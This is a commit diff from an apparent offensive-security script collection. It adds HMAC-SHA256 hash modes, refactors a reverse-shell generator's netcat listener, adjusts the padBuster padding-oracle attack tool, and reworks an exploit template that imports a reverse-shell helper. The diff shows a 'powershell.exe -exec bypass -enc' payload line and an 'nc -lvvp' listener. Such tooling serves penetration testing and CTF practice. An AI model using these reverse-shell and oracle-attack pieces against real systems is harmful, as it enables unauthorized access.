Update
This commit is contained in:
parent
2f555c5b9e
commit
718aaa6f6c
@ -33,6 +33,8 @@ class HashType(enum.Enum):
|
||||
RAW_SHA2_256 = 1400
|
||||
SHA256_PASS_SALT = 1410
|
||||
SHA256_SALT_PASS = 1420
|
||||
HMAC_SHA256_PASS = 1450
|
||||
HMAC_SHA256_SALT = 1460
|
||||
RAW_SHA2_384 = 10800
|
||||
RAW_SHA2_512 = 1700
|
||||
SHA512_PASS_SALT = 1710
|
||||
@ -181,6 +183,8 @@ class Hash:
|
||||
if self.isSalted:
|
||||
self.type.append(HashType.SHA256_PASS_SALT)
|
||||
self.type.append(HashType.SHA256_SALT_PASS)
|
||||
self.type.append(HashType.HMAC_SHA256_PASS)
|
||||
self.type.append(HashType.HMAC_SHA256_SALT)
|
||||
else:
|
||||
self.type.append(HashType.RAW_SHA2_256)
|
||||
self.type.append(HashType.RAW_SHA3_256)
|
||||
|
||||
@ -36,13 +36,16 @@ def generatePayload(type, local_address, port):
|
||||
payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
|
||||
return f"powershell.exe -exec bypass -enc {payload_encoded}"
|
||||
|
||||
def spawn_listener(port):
|
||||
pty.spawn(["nc", "-lvvp", str(port)])
|
||||
|
||||
def triggerShell(func, port):
|
||||
def _wait_and_exec():
|
||||
time.sleep(1.5)
|
||||
func()
|
||||
|
||||
threading.Thread(target=_wait_and_exec).start()
|
||||
pty.spawn(["nc", "-lvvp", str(port)])
|
||||
spawn_listener(port)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
2
padBuster.pl
Normal file → Executable file
2
padBuster.pl
Normal file → Executable file
@ -527,7 +527,7 @@ sub processBlock {
|
||||
|
||||
my $continue = "y";
|
||||
|
||||
if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
|
||||
if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
|
||||
# This is for autoretry logic (only works on the first byte)
|
||||
if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
|
||||
$hasHit++;
|
||||
|
||||
30
template.py
30
template.py
@ -5,36 +5,34 @@ import sys
|
||||
def generateTemplate(baseUrl):
|
||||
template = """#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import base64
|
||||
import requests
|
||||
import subprocess
|
||||
import urllib.parse
|
||||
from bs4 import BeautifulSoup
|
||||
from hackingscripts import util, fileserver
|
||||
from hackingscripts import util, fileserver, genRevShell
|
||||
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
|
||||
USERNAME = "admin"
|
||||
PASSWORD = "password"
|
||||
|
||||
def login(username, password):
|
||||
session = requests.Session()
|
||||
post_data = { "username": username, "password": password }
|
||||
res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False)
|
||||
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
|
||||
print("Login failed")
|
||||
exit()
|
||||
return session
|
||||
def request(method, uri, **kwargs):
|
||||
if not uri.startswith("/") and uri != "":
|
||||
uri = "/" + uri
|
||||
|
||||
def exploit(session, payload):
|
||||
# Template method to exploit an endpoint
|
||||
pass
|
||||
client = requests
|
||||
if "session" in kwargs:
|
||||
client = kwargs["session"]
|
||||
del kwargs["session"]
|
||||
|
||||
return client.request(method, BASE_URL + uri, verify=False, allow_redirects=False, **kwargs)
|
||||
|
||||
if __name__ == "__main__":
|
||||
session = login(USERNAME, PASSWORD)
|
||||
exploit(session, "id")
|
||||
pass
|
||||
""" % baseUrl
|
||||
|
||||
return template
|
||||
|
||||
Loading…
Reference in New Issue
Block a user